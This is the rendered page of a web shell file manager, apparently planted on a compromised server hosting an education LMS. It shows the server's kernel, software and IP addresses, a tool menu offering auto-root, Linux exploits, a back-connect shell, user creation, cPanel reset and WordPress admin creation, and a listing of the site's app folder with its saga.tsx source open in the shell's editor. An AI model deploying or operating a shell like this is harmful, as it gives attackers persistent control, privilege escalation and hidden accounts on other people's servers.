Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
containers
[ DIR ]
drwxr-xr-x
edusewa
[ DIR ]
drwxr-xr-x
helpers
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
service
[ DIR ]
drwxr-xr-x
styles
[ DIR ]
drwxr-xr-x
translations
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.htaccess
1.75
KB
-rw-r--r--
.nginx.conf
3.21
KB
-rw-r--r--
app.tsx
4.15
KB
-rw-r--r--
configureStore.ts
4.25
KB
-rw-r--r--
global-styles.ts
658
B
-rw-r--r--
globals.d.tsx
401
B
-rw-r--r--
i18n.ts
1.26
KB
-rw-r--r--
index.html
6.25
KB
-rw-r--r--
locales.ts
95
B
-rw-r--r--
reducers.ts
3.76
KB
-rw-r--r--
saga.tsx
2.72
KB
-rw-r--r--
utils.d.ts
74
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : saga.tsx
import { all } from 'redux-saga/effects'; //FRONT import { saga as authSaga } from 'containers/auth/store/saga'; import { saga as dashboardSaga } from 'containers/front/store/dashboard/saga'; import { saga as subjectSaga } from 'containers/front/store/subject/saga'; import { saga as resourceSaga } from 'containers/front/store/resource/saga'; import { saga as resourceLessonSaga } from 'containers/front/store/resource_lesson/saga'; import { saga as resourceMaterialSaga } from 'containers/front/store/resource_material/saga'; import { saga as resourceNoteSaga } from 'containers/front/store/resource_note/saga'; import { saga as resourceNoteCommentSaga } from 'containers/front/store/resource_note_comment/saga'; import { saga as resourceQASaga } from 'containers/front/store/resource_qa/saga'; import { saga as resourceAssignmentSaga } from 'containers/front/store/resource_assignment/saga'; import { saga as resourceAssignmentMaterialSaga } from 'containers/front/store/resource_assignment_material/saga'; import { saga as resourceAssignmentSubmissionSaga } from 'containers/front/store/resource_assignment_submission/saga'; import { saga as resourceTestSaga } from 'containers/front/store/resource_test/saga'; import { saga as resourceTestQuestionSaga } from 'containers/front/store/resource_test_question/saga'; import { saga as resourceStudentTestSaga } from 'containers/front/store/resource_student_test/saga'; import { saga as resourceStudentTestAnswerSaga } from 'containers/front/store/resource_student_test_answer/saga'; // ADMIN import { saga as classroomSaga } from 'containers/admin/store/classroom/saga'; import { saga as commonSaga } from 'containers/admin/store/common/saga'; import { saga as resourceSubjectSaga } from 'containers/admin/store/subject/saga'; import { saga as resourceSubjectTeacherSaga } from 'containers/admin/store/teacher/saga'; import { saga as resourceSubjectStudentSaga } from 'containers/admin/store/student/saga'; import { saga as manageUserSaga } from 'containers/admin/store/manageuser/saga'; export default function* rootSaga() { yield all([ authSaga(), dashboardSaga(), subjectSaga(), classroomSaga(), commonSaga(), resourceSaga(), resourceSubjectSaga(), resourceLessonSaga(), resourceMaterialSaga(), resourceNoteSaga(), resourceQASaga(), resourceAssignmentSaga(), resourceAssignmentMaterialSaga(), resourceAssignmentSubmissionSaga(), resourceTestSaga(), resourceTestQuestionSaga(), resourceStudentTestSaga(), resourceStudentTestAnswerSaga(), resourceNoteCommentSaga(), resourceSubjectTeacherSaga(), manageUserSaga(), resourceSubjectStudentSaga() ]); }
Close